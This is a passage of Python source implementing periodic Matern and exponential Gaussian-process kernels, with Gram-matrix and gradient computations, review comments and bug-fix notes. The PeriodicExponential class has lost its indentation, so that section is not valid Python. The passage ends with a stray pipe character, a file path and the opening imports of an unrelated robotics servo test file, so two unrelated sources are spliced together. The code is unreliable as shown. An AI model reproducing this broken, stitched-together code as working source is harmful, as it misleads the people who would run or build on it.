        Gint1 = 1./(omega1+omega2.T)*( np.sin((omega1+omega2.T)*self.upper+phi1+phi2.T) - np.sin((omega1+omega2.T)*self.lower+phi1+phi2.T)) + 1./(omega1-omega2.T)*( np.sin((omega1-omega2.T)*self.upper+phi1-phi2.T) - np.sin((omega1-omega2.T)*self.lower+phi1-phi2.T) )
        Gint2 = 1./(omega1+omega2.T)*( np.sin((omega1+omega2.T)*self.upper+phi1+phi2.T) - np.sin((omega1+omega2.T)*self.lower+phi1+phi2.T)) + np.cos(phi1-phi2.T)*(self.upper-self.lower)
        Gint = np.dot(r1,r2.T)/2 * np.where(np.isnan(Gint1),Gint2,Gint1)
        return Gint

    def K(self, X, X2=None):
        # K(X, X2) = F(X) Gi F(X2)^T with F the cosine feature map set up
        # by the subclass's parameters_changed().
        FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
        if X2 is None:
            FX2 = FX
        else:
            FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
        return mdot(FX,self.Gi,FX2.T)

    def Kdiag(self,X):
        # Simple (inefficient) diagonal: full K then its diagonal.
        return np.diag(self.K(X))
class PeriodicExponential(Periodic):
"""
Kernel of the periodic subspace (up to a given frequency) of a exponential
(Matern 1/2) RKHS.
Only defined for input_dim=1.
"""
def __init__(self, input_dim=1, variance=1., lengthscale=1., period=2.*np.pi, n_freq=10, lower=0., upper=4*np.pi, active_dims=None, name='periodic_exponential'):
    # All parameters are handled by the Periodic base class.
    super(PeriodicExponential, self).__init__(input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name)
def parameters_changed(self):
    """Rebuild the cosine basis and Gram matrix after a parameter update."""
    # Coefficients of the exponential (Matern 1/2) differential operator.
    self.a = [1./self.lengthscale, 1.]
    self.b = [1]

    self.basis_alpha = np.ones((self.n_basis,))
    # Frequencies 2*pi*k/period, each repeated for the (cos, sin) pair.
    self.basis_omega = (2*np.pi*np.arange(1,self.n_freq+1)/self.period).repeat(2)
    self.basis_phi = np.zeros(self.n_freq * 2)
    # A phase of -pi/2 turns cos into sin for every other basis function.
    self.basis_phi[::2] = -np.pi/2

    self.G = self.Gram_matrix()
    self.Gi = np.linalg.inv(self.G)
def Gram_matrix(self):
    """Gram matrix of the basis under the exponential RKHS inner product.

    Combines the integral term (via the cosine factorization of the
    differential operator applied to the basis) with a boundary term
    evaluated at self.lower.
    """
    # Operator applied to the basis: a0*f + a1*f' as a sum of cosines.
    La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega))
    Lo = np.column_stack((self.basis_omega,self.basis_omega))
    # Differentiation shifts the phase by pi/2.
    Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2))
    r,omega,phi = self._cos_factorization(La,Lo,Lp)
    Gint = self._int_computation( r,omega,phi, r,omega,phi)
    # Boundary term: basis evaluated at the lower integration bound.
    Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
    return(self.lengthscale/(2*self.variance) * Gint + 1./self.variance*np.dot(Flower,Flower.T))
@silence_errors
def update_gradients_full(self, dL_dK, X, X2=None):
"""derivative of the covariance matrix with respect to the parameters (shape is N x num_inducing x num_params)"""
if X2 is None: X2 = X
FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega))
Lo = np.column_stack((self.basis_omega,self.basis_omega))
Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
dK_dvar = 1./self.variance*mdot(FX,self.Gi,FX2.T)
da_dlen = [-1./self.lengthscale**2,0.]
dLa_dlen = np.column_stack((da_dlen[0]*np.ones((self.n_basis,1)),da_dlen[1]*self.basis_omega))
r1,omega1,phi1 = self._cos_factorization(dLa_dlen,Lo,Lp)
dGint_dlen = self._int_computation(r1,omega1,phi1, r,omega,phi)
dGint_dlen = dGint_dlen + dGint_dlen.T
dG_dlen = 1./2*Gint + self.lengthscale/2*dGint_dlen
dK_dlen = -mdot(FX,self.Gi,dG_dlen/self.variance,self.Gi,FX2.T)
dFX_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X ,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X)
dFX2_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X2,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X2)
dLa_dper = np.column_stack((-self.a[0]*self.basis_omega/self.period, -self.a[1]*self.basis_omega**2/self.period))
dLp_dper = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi))
r1,omega1,phi1 = self._cos_factorization(dLa_dper,Lo,dLp_dper)
IPPprim1 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi/2))
IPPprim1 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi/2))
IPPprim2 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + self.upper*np.cos(phi-phi1.T))
IPPprim2 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + self.lower*np.cos(phi-phi1.T))
IPPprim = np.where(np.logical_or(np.isnan(IPPprim1), np.isinf(IPPprim1)), IPPprim2, IPPprim1)
IPPint1 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi)
IPPint1 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi)
IPPint2 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./2*self.upper**2*np.cos(phi-phi1.T)
IPPint2 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./2*self.lower**2*np.cos(phi-phi1.T)
IPPint = np.where(np.isnan(IPPint1),IPPint2,IPPint1)
dLa_dper2 = np.column_stack((-self.a[1]*self.basis_omega/self.period))
dLp_dper2 = np.column_stack((self.basis_phi+np.pi/2))
r2,omega2,phi2 = dLa_dper2.T,Lo[:,0:1],dLp_dper2.T
dGint_dper = np.dot(r,r1.T)/2 * (IPPprim - IPPint) + self._int_computation(r2,omega2,phi2, r,omega,phi)
dGint_dper = dGint_dper + dGint_dper.T
dFlower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dG_dper = 1./self.variance*(self.lengthscale/2*dGint_dper + self.b[0]*(np.dot(dFlower_dper,Flower.T)+np.dot(Flower,dFlower_dper.T)))
dK_dper = mdot(dFX_dper,self.Gi,FX2.T) - mdot(FX,self.Gi,dG_dper,self.Gi,FX2.T) + mdot(FX,self.Gi,dFX2_dper.T)
self.variance.gradient = np.sum(dK_dvar*dL_dK)
self.lengthscale.gradient = np.sum(dK_dlen*dL_dK)
self.period.gradient = np.sum(dK_dper*dL_dK)
class PeriodicMatern32(Periodic):
    """
    Kernel of the periodic subspace (up to a given frequency) of a Matern 3/2 RKHS. Only defined for input_dim=1.

    :param input_dim: the number of input dimensions
    :type input_dim: int
    :param variance: the variance of the Matern kernel
    :type variance: float
    :param lengthscale: the lengthscale of the Matern kernel
    :type lengthscale: np.ndarray of size (input_dim,)
    :param period: the period
    :type period: float
    :param n_freq: the number of frequencies considered for the periodic subspace
    :type n_freq: int
    :rtype: kernel object
    """
    def __init__(self, input_dim=1, variance=1., lengthscale=1., period=2.*np.pi, n_freq=10, lower=0., upper=4*np.pi, active_dims=None, name='periodic_Matern32'):
        super(PeriodicMatern32, self).__init__(input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name)
    def parameters_changed(self):
        """Recompute all cached quantities after any parameter update."""
        # Coefficients of the Matern-3/2 differential operator
        # L[f] = a0*f + a1*f' + a2*f''.
        self.a = [3./self.lengthscale**2, 2*np.sqrt(3)/self.lengthscale, 1.]
        # Weights of the boundary terms in the RKHS inner product.
        self.b = [1,self.lengthscale**2/3]
        # Truncated Fourier basis: a cos/sin pair per frequency; a phase of
        # -pi/2 on even-indexed entries turns cos into sin.
        self.basis_alpha = np.ones((self.n_basis,))
        self.basis_omega = (2*np.pi*np.arange(1,self.n_freq+1)/self.period).repeat(2)
        self.basis_phi = np.zeros(self.n_freq * 2)
        self.basis_phi[::2] = -np.pi/2
        # Cache the Gram matrix and its inverse for K and the gradients.
        self.G = self.Gram_matrix()
        self.Gi = np.linalg.inv(self.G)
    def Gram_matrix(self):
        """Gram matrix of the RKHS inner product in the truncated Fourier basis."""
        # L applied to each basis function, written as a sum of cosines
        # (each derivative shifts the phase by pi/2).
        La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega,self.a[2]*self.basis_omega**2))
        Lo = np.column_stack((self.basis_omega,self.basis_omega,self.basis_omega))
        Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2,self.basis_phi+np.pi))
        # Collapse each row of cosines into one equivalent cosine, then
        # integrate products over [lower, upper].
        r,omega,phi = self._cos_factorization(La,Lo,Lp)
        Gint = self._int_computation( r,omega,phi, r,omega,phi)
        # Basis and its first derivative at the lower bound (boundary terms).
        Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
        F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        return(self.lengthscale**3/(12*np.sqrt(3)*self.variance) * Gint + 1./self.variance*np.dot(Flower,Flower.T) + self.lengthscale**2/(3.*self.variance)*np.dot(F1lower,F1lower.T))
    @silence_errors
    def update_gradients_full(self,dL_dK,X,X2):
        """derivative of the covariance matrix with respect to the parameters (shape is num_data x num_inducing x num_params)

        NOTE(review): unlike the sibling classes, X2 has no default value in
        this signature; callers must pass it explicitly (None is accepted).
        """
        if X2 is None: X2 = X
        # Feature maps at the two input sets.
        FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
        FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
        # Rebuild the factored-cosine form of L[basis] (as in Gram_matrix).
        La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega,self.a[2]*self.basis_omega**2))
        Lo = np.column_stack((self.basis_omega,self.basis_omega,self.basis_omega))
        Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2,self.basis_phi+np.pi))
        r,omega,phi = self._cos_factorization(La,Lo,Lp)
        Gint = self._int_computation( r,omega,phi, r,omega,phi)
        Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
        F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        # --- gradient w.r.t. variance ---
        dK_dvar = 1./self.variance*mdot(FX,self.Gi,FX2.T)
        # --- gradient w.r.t. lengthscale: differentiate operator and boundary weights ---
        da_dlen = [-6/self.lengthscale**3,-2*np.sqrt(3)/self.lengthscale**2,0.]
        db_dlen = [0.,2*self.lengthscale/3.]
        dLa_dlen = np.column_stack((da_dlen[0]*np.ones((self.n_basis,1)),da_dlen[1]*self.basis_omega,da_dlen[2]*self.basis_omega**2))
        r1,omega1,phi1 = self._cos_factorization(dLa_dlen,Lo,Lp)
        dGint_dlen = self._int_computation(r1,omega1,phi1, r,omega,phi)
        # Symmetrize: product rule contributes both <dL b, L b> and <L b, dL b>.
        dGint_dlen = dGint_dlen + dGint_dlen.T
        dG_dlen = self.lengthscale**2/(4*np.sqrt(3))*Gint + self.lengthscale**3/(12*np.sqrt(3))*dGint_dlen + db_dlen[0]*np.dot(Flower,Flower.T) + db_dlen[1]*np.dot(F1lower,F1lower.T)
        # d(G^-1)/dtheta = -G^-1 dG/dtheta G^-1.
        dK_dlen = -mdot(FX,self.Gi,dG_dlen/self.variance,self.Gi,FX2.T)
        # --- gradient w.r.t. period: basis frequencies depend on the period ---
        dFX_dper  = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X ,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X)
        dFX2_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X2,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X2)
        dLa_dper = np.column_stack((-self.a[0]*self.basis_omega/self.period, -self.a[1]*self.basis_omega**2/self.period, -self.a[2]*self.basis_omega**3/self.period))
        dLp_dper = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi,self.basis_phi+np.pi*3/2))
        r1,omega1,phi1 = self._cos_factorization(dLa_dper,Lo,dLp_dper)
        # Antiderivative terms of d/dperiod of the integral; the *1 forms hit
        # 0/0 where omega == omega1.T, for which the *2 closed forms are
        # substituted via np.where below.
        IPPprim1 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi/2))
        IPPprim1 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi/2))
        IPPprim2 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + self.upper*np.cos(phi-phi1.T))
        IPPprim2 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + self.lower*np.cos(phi-phi1.T))
        IPPprim = np.where(np.isnan(IPPprim1),IPPprim2,IPPprim1)
        IPPint1 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi)
        IPPint1 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi)
        IPPint2 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./2*self.upper**2*np.cos(phi-phi1.T)
        IPPint2 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./2*self.lower**2*np.cos(phi-phi1.T)
        IPPint = np.where(np.isnan(IPPint1),IPPint2,IPPint1)
        # Extra term from d(L)/dperiod acting through the operator coefficients.
        dLa_dper2 = np.column_stack((-self.a[1]*self.basis_omega/self.period, -2*self.a[2]*self.basis_omega**2/self.period))
        dLp_dper2 = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi))
        r2,omega2,phi2 = self._cos_factorization(dLa_dper2,Lo[:,0:2],dLp_dper2)
        dGint_dper = np.dot(r,r1.T)/2 * (IPPprim - IPPint) + self._int_computation(r2,omega2,phi2, r,omega,phi)
        dGint_dper = dGint_dper + dGint_dper.T
        # Derivatives of the boundary terms at the lower bound.
        dFlower_dper  = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        dF1lower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega**2/self.period,self.basis_omega,self.basis_phi+np.pi)(self.lower)+self._cos(-self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        dG_dper = 1./self.variance*(self.lengthscale**3/(12*np.sqrt(3))*dGint_dper + self.b[0]*(np.dot(dFlower_dper,Flower.T)+np.dot(Flower,dFlower_dper.T)) + self.b[1]*(np.dot(dF1lower_dper,F1lower.T)+np.dot(F1lower,dF1lower_dper.T)))
        dK_dper = mdot(dFX_dper,self.Gi,FX2.T) - mdot(FX,self.Gi,dG_dper,self.Gi,FX2.T) + mdot(FX,self.Gi,dFX2_dper.T)
        # Accumulate the chain-rule products into the parameter gradients.
        self.variance.gradient = np.sum(dK_dvar*dL_dK)
        self.lengthscale.gradient = np.sum(dK_dlen*dL_dK)
        self.period.gradient = np.sum(dK_dper*dL_dK)
class PeriodicMatern52(Periodic):
    """
    Kernel of the periodic subspace (up to a given frequency) of a Matern 5/2 RKHS. Only defined for input_dim=1.

    :param input_dim: the number of input dimensions
    :type input_dim: int
    :param variance: the variance of the Matern kernel
    :type variance: float
    :param lengthscale: the lengthscale of the Matern kernel
    :type lengthscale: np.ndarray of size (input_dim,)
    :param period: the period
    :type period: float
    :param n_freq: the number of frequencies considered for the periodic subspace
    :type n_freq: int
    :rtype: kernel object
    """
    def __init__(self, input_dim=1, variance=1., lengthscale=1., period=2.*np.pi, n_freq=10, lower=0., upper=4*np.pi, active_dims=None, name='periodic_Matern52'):
        super(PeriodicMatern52, self).__init__(input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name)
    def parameters_changed(self):
        """Recompute all cached quantities after any parameter update."""
        # Coefficients of the Matern-5/2 differential operator
        # L[f] = a0*f + a1*f' + a2*f'' + a3*f'''.
        self.a = [5*np.sqrt(5)/self.lengthscale**3, 15./self.lengthscale**2, 3*np.sqrt(5)/self.lengthscale, 1.]
        # Weights of the boundary terms in the RKHS inner product.
        self.b = [9./8, 9*self.lengthscale**4/200., 3*self.lengthscale**2/5., 3*self.lengthscale**2/(5*8.), 3*self.lengthscale**2/(5*8.)]
        # Truncated Fourier basis: a cos/sin pair per frequency (2*n_freq
        # functions); a phase of -pi/2 on even-indexed entries turns cos into sin.
        self.basis_alpha = np.ones((2*self.n_freq,))
        self.basis_omega = (2*np.pi*np.arange(1,self.n_freq+1)/self.period).repeat(2)
        self.basis_phi = np.zeros(self.n_freq * 2)
        self.basis_phi[::2] = -np.pi/2
        # Cache the Gram matrix and its inverse for K and the gradients.
        self.G = self.Gram_matrix()
        self.Gi = np.linalg.inv(self.G)
    def Gram_matrix(self):
        """Gram matrix of the RKHS inner product in the truncated Fourier basis."""
        # L applied to each basis function, written as a sum of four cosines
        # (one column per derivative order; each derivative shifts the phase by pi/2).
        La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)), self.a[1]*self.basis_omega, self.a[2]*self.basis_omega**2, self.a[3]*self.basis_omega**3))
        Lo = np.column_stack((self.basis_omega, self.basis_omega, self.basis_omega, self.basis_omega))
        Lp = np.column_stack((self.basis_phi, self.basis_phi+np.pi/2, self.basis_phi+np.pi, self.basis_phi+np.pi*3/2))
        # Collapse each row of cosines into one equivalent cosine, then
        # integrate products over [lower, upper].
        r,omega,phi = self._cos_factorization(La,Lo,Lp)
        Gint = self._int_computation( r,omega,phi, r,omega,phi)
        # Basis and its first/second derivatives at the lower bound (boundary terms).
        Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
        F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        F2lower = np.array(self._cos(self.basis_alpha*self.basis_omega**2,self.basis_omega,self.basis_phi+np.pi)(self.lower))[:,None]
        lower_terms = self.b[0]*np.dot(Flower,Flower.T) + self.b[1]*np.dot(F2lower,F2lower.T) + self.b[2]*np.dot(F1lower,F1lower.T) + self.b[3]*np.dot(F2lower,Flower.T) + self.b[4]*np.dot(Flower,F2lower.T)
        return(3*self.lengthscale**5/(400*np.sqrt(5)*self.variance) * Gint + 1./self.variance*lower_terms)
    @silence_errors
    def update_gradients_full(self, dL_dK, X, X2=None):
        """derivative of the covariance matrix with respect to the parameters (shape is num_data x num_inducing x num_params)"""
        if X2 is None: X2 = X
        # Feature maps at the two input sets.
        FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
        FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
        # Rebuild the factored-cosine form of L[basis] (as in Gram_matrix).
        La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)), self.a[1]*self.basis_omega, self.a[2]*self.basis_omega**2, self.a[3]*self.basis_omega**3))
        Lo = np.column_stack((self.basis_omega, self.basis_omega, self.basis_omega, self.basis_omega))
        Lp = np.column_stack((self.basis_phi, self.basis_phi+np.pi/2, self.basis_phi+np.pi, self.basis_phi+np.pi*3/2))
        r,omega,phi = self._cos_factorization(La,Lo,Lp)
        Gint = self._int_computation( r,omega,phi, r,omega,phi)
        Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
        F1lower = np.array(self._cos(self.basis_alpha*self.basis_omega,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        F2lower = np.array(self._cos(self.basis_alpha*self.basis_omega**2,self.basis_omega,self.basis_phi+np.pi)(self.lower))[:,None]
        # --- gradient w.r.t. variance ---
        dK_dvar = 1./self.variance*mdot(FX,self.Gi,FX2.T)
        # --- gradient w.r.t. lengthscale: differentiate operator and boundary weights ---
        da_dlen = [-3*self.a[0]/self.lengthscale, -2*self.a[1]/self.lengthscale, -self.a[2]/self.lengthscale, 0.]
        db_dlen = [0., 4*self.b[1]/self.lengthscale, 2*self.b[2]/self.lengthscale, 2*self.b[3]/self.lengthscale, 2*self.b[4]/self.lengthscale]
        dLa_dlen = np.column_stack((da_dlen[0]*np.ones((self.n_basis,1)), da_dlen[1]*self.basis_omega, da_dlen[2]*self.basis_omega**2, da_dlen[3]*self.basis_omega**3))
        r1,omega1,phi1 = self._cos_factorization(dLa_dlen,Lo,Lp)
        dGint_dlen = self._int_computation(r1,omega1,phi1, r,omega,phi)
        # Symmetrize: product rule contributes both <dL b, L b> and <L b, dL b>.
        dGint_dlen = dGint_dlen + dGint_dlen.T
        dlower_terms_dlen = db_dlen[0]*np.dot(Flower,Flower.T) + db_dlen[1]*np.dot(F2lower,F2lower.T) + db_dlen[2]*np.dot(F1lower,F1lower.T) + db_dlen[3]*np.dot(F2lower,Flower.T) + db_dlen[4]*np.dot(Flower,F2lower.T)
        dG_dlen = 15*self.lengthscale**4/(400*np.sqrt(5))*Gint + 3*self.lengthscale**5/(400*np.sqrt(5))*dGint_dlen + dlower_terms_dlen
        # d(G^-1)/dtheta = -G^-1 dG/dtheta G^-1.
        dK_dlen = -mdot(FX,self.Gi,dG_dlen/self.variance,self.Gi,FX2.T)
        # --- gradient w.r.t. period: basis frequencies depend on the period ---
        dFX_dper  = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X ,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X)
        dFX2_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X2,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X2)
        dLa_dper = np.column_stack((-self.a[0]*self.basis_omega/self.period, -self.a[1]*self.basis_omega**2/self.period, -self.a[2]*self.basis_omega**3/self.period, -self.a[3]*self.basis_omega**4/self.period))
        dLp_dper = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi,self.basis_phi+np.pi*3/2,self.basis_phi))
        r1,omega1,phi1 = self._cos_factorization(dLa_dper,Lo,dLp_dper)
        # Antiderivative terms of d/dperiod of the integral; the *1 forms hit
        # 0/0 where omega == omega1.T, for which the *2 closed forms are
        # substituted via np.where below.
        IPPprim1 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi/2))
        IPPprim1 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi/2))
        IPPprim2 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + self.upper*np.cos(phi-phi1.T))
        IPPprim2 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + self.lower*np.cos(phi-phi1.T))
        IPPprim = np.where(np.isnan(IPPprim1),IPPprim2,IPPprim1)
        IPPint1 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi)
        IPPint1 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi)
        IPPint2 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./2*self.upper**2*np.cos(phi-phi1.T)
        IPPint2 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./2*self.lower**2*np.cos(phi-phi1.T)
        IPPint = np.where(np.isnan(IPPint1),IPPint2,IPPint1)
        # Extra term from d(L)/dperiod acting through the operator coefficients.
        dLa_dper2 = np.column_stack((-self.a[1]*self.basis_omega/self.period, -2*self.a[2]*self.basis_omega**2/self.period, -3*self.a[3]*self.basis_omega**3/self.period))
        dLp_dper2 = np.column_stack((self.basis_phi+np.pi/2, self.basis_phi+np.pi, self.basis_phi+np.pi*3/2))
        # BUGFIX: dLa_dper2/dLp_dper2 have three columns here, so the matching
        # slice of Lo must also have three columns. Lo[:,0:2] was a copy-paste
        # from the Matern-3/2 case (which has only two columns) and made the
        # arguments of _cos_factorization shape-inconsistent.
        r2,omega2,phi2 = self._cos_factorization(dLa_dper2,Lo[:,0:3],dLp_dper2)
        dGint_dper = np.dot(r,r1.T)/2 * (IPPprim - IPPint) + self._int_computation(r2,omega2,phi2, r,omega,phi)
        dGint_dper = dGint_dper + dGint_dper.T
        # Derivatives of the boundary terms at the lower bound.
        dFlower_dper  = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        dF1lower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega**2/self.period,self.basis_omega,self.basis_phi+np.pi)(self.lower)+self._cos(-self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
        dF2lower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega**3/self.period,self.basis_omega,self.basis_phi+np.pi*3/2)(self.lower) + self._cos(-2*self.basis_alpha*self.basis_omega**2/self.period,self.basis_omega,self.basis_phi+np.pi)(self.lower))[:,None]
        # BUGFIX: the second term of the b[0] product was
        # np.dot(Flower.T, dFlower_dper), a (1,1) scalar that silently
        # broadcast over the (n,n) matrix. The symmetric outer product
        # np.dot(Flower, dFlower_dper.T) matches the b[1]..b[4] terms below
        # and the Matern-3/2 implementation.
        dlower_terms_dper = self.b[0] * (np.dot(dFlower_dper,Flower.T) + np.dot(Flower,dFlower_dper.T))
        dlower_terms_dper += self.b[1] * (np.dot(dF2lower_dper,F2lower.T) + np.dot(F2lower,dF2lower_dper.T)) - 4*self.b[1]/self.period*np.dot(F2lower,F2lower.T)
        dlower_terms_dper += self.b[2] * (np.dot(dF1lower_dper,F1lower.T) + np.dot(F1lower,dF1lower_dper.T)) - 2*self.b[2]/self.period*np.dot(F1lower,F1lower.T)
        dlower_terms_dper += self.b[3] * (np.dot(dF2lower_dper,Flower.T) + np.dot(F2lower,dFlower_dper.T)) - 2*self.b[3]/self.period*np.dot(F2lower,Flower.T)
        dlower_terms_dper += self.b[4] * (np.dot(dFlower_dper,F2lower.T) + np.dot(Flower,dF2lower_dper.T)) - 2*self.b[4]/self.period*np.dot(Flower,F2lower.T)
        # NOTE(review): the 0.5 factor on dlower_terms_dper has no analogue in
        # the Matern-3/2 gradient above -- confirm against the derivation.
        dG_dper = 1./self.variance*(3*self.lengthscale**5/(400*np.sqrt(5))*dGint_dper + 0.5*dlower_terms_dper)
        dK_dper = mdot(dFX_dper,self.Gi,FX2.T) - mdot(FX,self.Gi,dG_dper,self.Gi,FX2.T) + mdot(FX,self.Gi,dFX2_dper.T)
        # Accumulate the chain-rule products into the parameter gradients.
        self.variance.gradient = np.sum(dK_dvar*dL_dK)
        self.lengthscale.gradient = np.sum(dK_dlen*dL_dK)
        self.period.gradient = np.sum(dK_dper*dL_dK)
|
data/IEEERobotics/bot/tests/test_servo.py
|
"""Test cases for servo abstraction class."""
from random import randint
from os import path
import bot.lib.lib as lib
import bot.hardware.servo as s_mod
import tests.test_bot as test_bot
